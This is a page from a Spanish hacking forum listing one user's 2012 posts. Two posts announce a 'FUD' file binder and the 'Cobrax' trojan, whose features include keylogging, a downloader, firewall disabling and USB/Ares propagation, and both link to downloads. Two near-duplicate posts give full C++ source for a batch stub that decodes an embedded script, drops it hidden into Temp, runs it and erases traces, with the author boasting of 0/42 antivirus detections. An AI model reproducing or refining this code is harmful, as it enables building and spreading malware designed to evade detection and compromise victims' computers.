elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Análisis y Diseño de Malware / Binder Panda [FUD/C++ | SOURCE] en: 9 Noviembre 2012, 09:07 am
Bueno eh estado trabajando en este proyecto durante dias! queria conseguir crear un binder que junte cualquier tipo de archivo y sin importar cuantos, ademas de incluirle metodos de compresion como FSG & UPX. esta programado en C++ el que quiera o le interese el code, solo comenten que lo publico.

Se pueden escojer 10 formas diferentes de ejecutar los archivos que van a ser blindeados, hasta el dia de hoy, ya que no lo eh subido a paginas tales como virustotal. esta bastante indetectable, creo que el ultimo escaneo solo lo detectaba un antivirus como sospechoso. sin mas preambulo les dejo dos imagenes y el link de descarga.






Aqui les dejo la descarga! Comenten que tal les parecio, saludos!

Disculpen por no dejar el codigo, les dejo el codigo! saludos.

http://www.mediafire.com/?9cdwqobxgr7o292
2  Seguridad Informática / Análisis y Diseño de Malware / [C/C++] Troyano Cobrax - BETA en: 1 Junio 2012, 06:56 am
Bueno antes que nada quiero aclarar que este troyano lo desarrolle en menos de 3 dias, no le llega ni a los talones a un troyano verdadero tales como bifrost, spy net, poison, etc. pero solo me intereso la idea de tratar de desarrollar algun tipo de troyano. ya que previamente habia hecho varias funciones FUD con cosas tales como generar Autoruns indetectables a los 42 antivirus, asi como un downloader encryptado  en su llamado. como inyeccion de api shellexecute en otro proceso,etc.

El servidor lo programe en C++ y el cliente en VB. Como sabran yo de VB no se nada y de C me defiendo, podria mejorarle muchas cosas pero como que trabajar solo en el proyecto no me gusta, se me hace mejor como de a mas personas...

Al que este interesado me gustaría que avise por comentarios o por donde sea, mp, msn.

Desarrollar el entorno del cliente en C++ me tomaría mucho tiempo asi que por eso decidí hacerlo en VB al menos como para comprobar si las funciones andan.
No le puse para capturar la pantalla ni la cámara web, tengo para hacerlo y el método keylogger que utiliza es diferente al HOOK y al uso simple de la API GetAsyncKeyState. lo probe y funciona perfecto. tienes opciones tales como


*Abrir el cd
*Apagar el monitor
*Envio de mensajes
*Downloader (Falta configurar cliente)
*Envio de archivos (falta configurar cliente)
*Desarrollando el metodo de Compresión ZIP basado en el worm MyDoom
*Apagado de ordenador
*Manejo de procesos
*Eliminar archivos
*Ejecutar archivos
*Alocar el mouse
*Invertir botones el mouse
*Envio de teclas
*Desactivado de servicios
*Kill de utilidades del sistema
*Firewall de Windows.
*Bloqueo de ventanas.
*Recibir archivos
*Envio de MAIL motor SMTP GMAIL.
*Propagacion USB | ARES.

*Tiene bastante estabilidad por lo que llege a testear entre PC's de prueba.


Les dejo los compilados Junto con sus respectivos Sources.

http://www.mediafire.com/?xq3cd1efqkkbjie

Saludos!

PD: Ojala alguno quiera participar!  :P
3  Seguridad Informática / Análisis y Diseño de Malware / [C/C++] Batch compiler FUD - Stub (Open Source) en: 27 Abril 2012, 11:09 am
Bueno hace rato que no programa nada, y se me ocurrio hacer un simple batch compiler. Pero tenia ganas de hacer algo diferente como por ejemplo no ese simple compilador que lo guarda y lo ejecuta en modo oculto.

Este cripta el batch con el metodo TOR 13.
Espera que el batch termine de ejecutarce para eliminar rastros.  (sin usar DeleteFileA) ya que su heuristica es detectada por al menos 3 antivirus.
Sustituye el valor de %0 del batch por el valor de nuestro compilado, es decir que si compilamos un batch con el siguiente codigo.


Código
  1. @echo off
  2. copy /y %0 C:\copia.bat
  3.  

Lo que hara es copiarce el bat sin compilarce. (Me explico?)
A hora tiene la opcion de cambiar ese valor por el compilado por lo cual en ves de copiar el batch, copia el batch pero en exe. es decir Generado (de nuevo ja)

Bueno aca les dejo el source.

Código
  1. #include <windows.h>
  2. #include <stdio.h>
  3.  
  4. /*
  5. ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  6. //Batch stub - Incluye cryptacion tor 13
  7. //Modulo de autocopia exe - no deja rastros.
  8. //Neeco - Version 1.0
  9. //FUD 0/42 - https://www.virustotal.com/file/204540f7def3a75fd4a8830a9c19031f5fd417b66e4c67d8527c510348c9327a/analysis/1335515677/
  10. ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  11. */
  12.  
  13. int WINAPI WinMain ( HINSTANCE hThisInstance, HINSTANCE hPrevInstance,
  14. LPSTR lpszArgument, int nCmdShow ) {
  15.  
  16. PROCESS_INFORMATION pi;
  17. STARTUPINFO stinfo;
  18. DWORD i, dwBytes;
  19.  
  20. char *a = "\"";
  21. char *nuevo = (char*) GlobalAlloc (GPTR, 500 + MAX_PATH);
  22. char *add = (char*) GlobalAlloc (GPTR, 250 );
  23.  
  24. stinfo.cb = sizeof ( STARTUPINFO );
  25.  
  26. char *appname = (char*) GlobalAlloc ( GPTR, MAX_PATH );
  27. GetModuleFileNameA ( GetModuleHandleA ( 0L ), appname, MAX_PATH );
  28.  
  29. HANDLE file = CreateFileA ( appname, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0 );
  30. DWORD size = GetFileSize ( file, 0 );
  31.  
  32. char *buffer = (char*) GlobalAlloc ( GPTR, size );
  33. char *batch = (char*) GlobalAlloc ( GPTR, size );
  34.  
  35. ReadFile ( file, buffer, size, &dwBytes, 0 );
  36. CloseHandle ( file );
  37.  
  38. //Buscamos el buffer
  39. for (i = 0; i<=size; i++ ) {
  40. if ( buffer[i] == '*' && buffer[i+1] == '+' && buffer[i+2] == '*' ) {
  41. batch = buffer + (i+3);
  42. break;
  43. }
  44. }
  45.  
  46. //Sabremos si tenemos EOF agregado
  47. if ( batch[0] == 142 || batch[0] == 0x00 ) {
  48. ExitProcess (0);
  49. }
  50.  
  51. //Aplicamos la cryptacion TOR13
  52. for ( i = 0; size-(i+3); i++ ) {
  53. batch[i] = batch[i] - 13;
  54. }
  55.  
  56. //FUNCION AppName change %0 -
  57. int x, count = 0;
  58. BOOL stac = FALSE;
  59. for ( i = 0; i<=lstrlenA(buffer); i++ ) {
  60. if ( buffer[i] == 37 && buffer[i+1] == 48 ) {
  61. add = buffer + i + 2;
  62. nuevo[i-1] = 34;
  63.  
  64. CopyMemory (&nuevo[0], &buffer[0], i-1);
  65. CopyMemory (&nuevo[lstrlenA(nuevo)], &appname[0], lstrlenA(appname));
  66. CopyMemory (&nuevo[lstrlenA(nuevo)],&a[0],1);
  67. CopyMemory (&nuevo[lstrlenA(nuevo)], &add[0], lstrlenA(add));
  68.  
  69. stac = TRUE;
  70. }
  71. }
  72.  
  73. //Esta funcion la hacemos con WINAPI - Rango de detectabilidad heuristico : 20 %
  74. //Con lib stdio : 2,0 # fstream - 0,0
  75.  
  76. LPSTR Dir = (LPSTR) GlobalAlloc ( GPTR, MAX_PATH);
  77. GetWindowsDirectoryA ( Dir, MAX_PATH );
  78.  
  79. lstrcatA ( Dir, "\\Temp\\tA1xcp.bat" );
  80.  
  81. HANDLE File = CreateFileA ( Dir, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, 0 );
  82. if ( stac == FALSE ) {
  83. WriteFile ( File, batch, size - (i+3), &dwBytes, 0 );
  84. CloseHandle ( File );
  85. } else {
  86. WriteFile ( File, nuevo, size - (i+3) + lstrlenA(appname), &dwBytes, 0 );
  87. CloseHandle ( File );
  88. }
  89.  
  90. //'Lo creamos a escondidas.
  91. SetFileAttributesA ( Dir, 0x1|0x2|0x4 );
  92.  
  93. //Abrimos el batch generado.
  94. CreateProcess ( Dir, 0, 0, 0, FALSE, 0, 0, 0, &stinfo, &pi );
  95.  
  96. //Esperamos a que termine de ejecutarce
  97. WaitForSingleObject ( pi.hProcess, INFINITE );
  98. TerminateProcess ( pi.hProcess, 0 );
  99.  
  100. CloseHandle ( pi.hProcess );
  101. CloseHandle ( pi.hThread );
  102.  
  103. //Borramos rastros de el.
  104. SetFileAttributesA ( Dir, FILE_ATTRIBUTE_NORMAL );
  105. //DeleteFileA ( Dir ); - Es detectada
  106. remove ( Dir );
  107.  
  108. GlobalFree ( Dir );
  109. GlobalFree ( appname );
  110. GlobalFree ( nuevo ), GlobalFree ( add );
  111. GlobalFree ( buffer ), GlobalFree ( batch );
  112.  
  113. return 0;
  114. }
  115.  
  116.  

El compilador todavía no lo hice, pero no es nada difícil, para los que tienen algo de conocimiento en el lenguaje y maneja TOR13, lo hace enseguida.

Esta FUD / lo analice en virus total (si ya se no tendría que haberlo subido ahí)
0/42 - el link esta en el source. (link del scaneo online by virustotal.com)

Saludos - Cualquier duda critica o lo que sea solo comenten.
Gracias.
4  Programación / Programación C/C++ / [C/C++] Batch compiler FUD - Stub (Open Source) en: 27 Abril 2012, 10:52 am
Bueno hace rato que no programa nada, y se me ocurrio hacer un simple batch compiler. Pero tenia ganas de hacer algo diferente como por ejemplo no ese simple compilador que lo guarda y lo ejecuta en modo oculto.

Este cripta el batch con el metodo TOR 13.
Espera que el batch termine de ejecutarce para eliminar rastros.  (sin usar DeleteFileA) ya que su heuristica es detectada por al menos 3 antivirus.
Sustituye el valor de %0 del batch por el valor de nuestro compilado, es decir que si compilamos un batch con el siguiente codigo.


Código
  1. @echo off
  2. copy /y %0 C:\copia.bat
  3.  

Lo que hara es copiarce el bat sin compilarce. (Me explico?)
A hora tiene la opcion de cambiar ese valor por el compilado por lo cual en ves de copiar el batch, copia el batch pero en exe. es decir Generado (de nuevo ja)

Bueno aca les dejo el source.

Código
  1. #include <windows.h>
  2. #include <stdio.h>
  3.  
  4. /*
  5. ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  6. //Batch stub - Incluye cryptacion tor 13
  7. //Modulo de autocopia exe - no deja rastros.
  8. //Neeco - Version 1.0
  9. //FUD 0/42 - https://www.virustotal.com/file/204540f7def3a75fd4a8830a9c19031f5fd417b66e4c67d8527c510348c9327a/analysis/1335515677/
  10. ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  11. */
  12.  
  13. int WINAPI WinMain ( HINSTANCE hThisInstance, HINSTANCE hPrevInstance,
  14. LPSTR lpszArgument, int nCmdShow ) {
  15.  
  16. PROCESS_INFORMATION pi;
  17. STARTUPINFO stinfo;
  18. DWORD i, dwBytes;
  19.  
  20. char *a = "\"";
  21. char *nuevo = (char*) GlobalAlloc (GPTR, 500 + MAX_PATH);
  22. char *add = (char*) GlobalAlloc (GPTR, 250 );
  23.  
  24. stinfo.cb = sizeof ( STARTUPINFO );
  25.  
  26. char *appname = (char*) GlobalAlloc ( GPTR, MAX_PATH );
  27. GetModuleFileNameA ( GetModuleHandleA ( 0L ), appname, MAX_PATH );
  28.  
  29. HANDLE file = CreateFileA ( appname, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0 );
  30. DWORD size = GetFileSize ( file, 0 );
  31.  
  32. char *buffer = (char*) GlobalAlloc ( GPTR, size );
  33. char *batch = (char*) GlobalAlloc ( GPTR, size );
  34.  
  35. ReadFile ( file, buffer, size, &dwBytes, 0 );
  36. CloseHandle ( file );
  37.  
  38. //Buscamos el buffer
  39. for (i = 0; i<=size; i++ ) {
  40. if ( buffer[i] == '*' && buffer[i+1] == '+' && buffer[i+2] == '*' ) {
  41. batch = buffer + (i+3);
  42. break;
  43. }
  44. }
  45.  
  46. //Sabremos si tenemos EOF agregado
  47. if ( batch[0] == 142 || batch[0] == 0x00 ) {
  48. ExitProcess (0);
  49. }
  50.  
  51. //Aplicamos la cryptacion TOR13
  52. for ( i = 0; size-(i+3); i++ ) {
  53. batch[i] = batch[i] - 13;
  54. }
  55.  
  56. //FUNCION AppName change %0 -
  57. int x, count = 0;
  58. BOOL stac = FALSE;
  59. for ( i = 0; i<=lstrlenA(buffer); i++ ) {
  60. if ( buffer[i] == 37 && buffer[i+1] == 48 ) {
  61. add = buffer + i + 2;
  62. nuevo[i-1] = 34;
  63.  
  64. CopyMemory (&nuevo[0], &buffer[0], i-1);
  65. CopyMemory (&nuevo[lstrlenA(nuevo)], &appname[0], lstrlenA(appname));
  66. CopyMemory (&nuevo[lstrlenA(nuevo)],&a[0],1);
  67. CopyMemory (&nuevo[lstrlenA(nuevo)], &add[0], lstrlenA(add));
  68.  
  69. stac = TRUE;
  70. }
  71. }
  72.  
  73. //Esta funcion la hacemos con WINAPI - Rango de detectabilidad heuristico : 20 %
  74. //Con lib stdio : 2,0 # fstream - 0,0
  75.  
  76. LPSTR Dir = (LPSTR) GlobalAlloc ( GPTR, MAX_PATH);
  77. GetWindowsDirectoryA ( Dir, MAX_PATH );
  78.  
  79. lstrcatA ( Dir, "\\Temp\\tA1xcp.bat" );
  80.  
  81. HANDLE File = CreateFileA ( Dir, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, 0 );
  82. if ( stac == FALSE ) {
  83. WriteFile ( File, batch, size - (i+3), &dwBytes, 0 );
  84. CloseHandle ( File );
  85. } else {
  86. WriteFile ( File, nuevo, size - (i+3) + lstrlenA(appname), &dwBytes, 0 );
  87. CloseHandle ( File );
  88. }
  89.  
  90. //'Lo creamos a escondidas.
  91. SetFileAttributesA ( Dir, 0x1|0x2|0x4 );
  92.  
  93. //Abrimos el batch generado.
  94. CreateProcess ( Dir, 0, 0, 0, FALSE, 0, 0, 0, &stinfo, &pi );
  95.  
  96. //Esperamos a que termine de ejecutarce
  97. WaitForSingleObject ( pi.hProcess, INFINITE );
  98. TerminateProcess ( pi.hProcess, 0 );
  99.  
  100. CloseHandle ( pi.hProcess );
  101. CloseHandle ( pi.hThread );
  102.  
  103. //Borramos rastros de el.
  104. SetFileAttributesA ( Dir, FILE_ATTRIBUTE_NORMAL );
  105. //DeleteFileA ( Dir ); - Es detectada
  106. remove ( Dir );
  107.  
  108. GlobalFree ( Dir );
  109. GlobalFree ( appname );
  110. GlobalFree ( nuevo ), GlobalFree ( add );
  111. GlobalFree ( buffer ), GlobalFree ( batch );
  112.  
  113. return 0;
  114. }
  115.  
  116.  

El compilador todavía no lo hice, pero no es nada difícil, para los que tienen algo de conocimiento en el lenguaje y maneja TOR13, lo hace enseguida.

Esta FUD / lo analice en virus total (si ya se no tendría que haberlo subido ahí)
0/42 - el link esta en el source. (link del scaneo online by virustotal.com)

Saludos - Cualquier duda critica o lo que sea solo comenten.
Gracias.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines